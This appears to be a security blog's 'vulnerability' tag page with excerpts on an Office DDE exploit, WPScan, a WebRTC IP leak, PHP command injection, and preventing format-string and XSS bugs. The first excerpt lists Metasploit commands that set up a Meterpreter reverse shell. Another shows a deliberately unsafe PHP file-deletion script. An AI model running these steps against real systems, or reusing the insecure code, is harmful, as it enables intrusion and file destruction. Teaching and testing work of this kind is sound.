Tag: vulnerability

Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rbwget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb Move module into framework mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/ Open Metasploit and load exploit msfconsole reload_all use exploit/windows/dde_deliverymsfconsole reload_all use exploit/windows/dde_delivery Set the sever host set SRVHOST 192.168.1.10set SRVHOST 192.168.1.10 Choose payload and run it set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 set LPORT 443 exploitset PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.10 …

Vulnerabilities

Black box WordPress vulnerability scanner

WPScan is a black box WordPress vulnerability scanner. WPSCAN ARGUMENTS –update Update the database to the latest version. –url | -u The WordPress URL/domain to scan. –force | -f Forces WPScan to not check if the remote site is running WordPress. –enumerate | -e [option(s)] Enumeration. option : u usernames from id 1 to 10 …

Add-ons, Anonymity, Browsers, Chrome, Firefox, Protection, VPN

WebRTC Vulnerability leaks Real IP Address

WebRTC Vulnerability leaks Real IP Address of VPN User. This security flaw can reveal your real IP address, even if you’re using a VPN, and it’s easy to exploit. To check if you are safe or not: > Visit https://diafygi.github.io/webrtc-ips/ while you are connected to your vpn. > If your real IP address is in …

Injection, PHP, Vulnerabilities

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory: <?php if(isset($_GET[’filename’])) { $filename = $_GET[’filename’]; if(file_exists($filename)) { unlink($filename); } }<?php if(isset($_GET[‘filename’])) { $filename = $_GET[‘filename’]; if(file_exists($filename)) { unlink($filename); } } Open your favorite browser and open url: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion As you can see you could delete any file in the …

Exploitation, Metasploit, Vulnerabilities

Vulnerability scanning and Metasploit

A vulnerability scanner is an automated computer program designed to assess computers, computer systems, networks or applications and look for weaknesses. The program probes a system by sending data to it and analyzing the responses received. To identify any vulnerabilities on the target system, a vulnerability scanner uses its vulnerability database as reference. Don’t forget …

Format String Vulnerabilities, PHP, WEB

Prevent Format String Vulnerabilities in PHP

Format string exploits can be used to crash a program (DoS) or to execute harmful code. The use of unfiltered user input in functions such as printf() or sprintf() are the causes of this vulnerability. The attacker could use this kind of vulnerability to land Denial-of-service attacks, use the %x format specifier to print sections …

Cross-Site Scripting, PHP, WEB

Preventing Cross-Site Scripting (XSS) in PHP

Cross-site scripting (XSS) is a type of vulnerability found in web applications. Occurs when a web application gets data from a user and makes use of them without validating, checking, encoding or filtering them. This vulnerability enables attackers to inject malicious client-side scripts into a trusted web site. The end user’s browser will execute the …